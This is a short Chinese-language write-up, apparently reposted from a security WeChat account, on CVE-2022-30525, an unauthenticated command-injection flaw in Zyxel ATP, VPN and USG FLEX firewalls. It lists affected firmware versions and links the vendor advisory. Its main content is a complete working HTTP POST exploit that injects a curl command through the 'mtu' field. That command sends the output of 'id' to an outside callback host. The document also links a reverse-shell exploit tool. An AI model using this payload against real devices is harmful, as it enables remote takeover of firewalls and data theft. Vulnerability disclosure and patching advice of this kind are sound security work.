漏洞编号:CVE-2022-30525
Rapid7 发现并报告了一个漏洞,该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。
USG FLEX 100、100W、200、500、700 < ZLD5.00 - ZLD5.21 USG20-VPN
USG20-VPN、USG20W-VPN < ZLD5.10 - ZLD5.21
ATP 100、200、500、700、800 < ZLD5.10 - ZLD5.21
以USG20 -VPN为例
攻击是通过/ztp/cgi-bin/handler
端点发起的,通过mtu参数进行命令执行
POST /ztp/cgi-bin/handler HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Type: application/json
Accept-Encoding: gzip
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl `id`.cbc2oelmk1u41mao0f10zeoez9n56xp8c.oast.live;","data":"hi"}
当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。
链接如下:
https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
参考链接/相关工具:
https://github.com/Chocapikk/CVE-2022-30525-Reverse-Shell
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-30525.yaml
原文始发于微信公众号(Timeline Sec):CVE-2022-30525:Zyxel防火墙未授权远程命令执行漏洞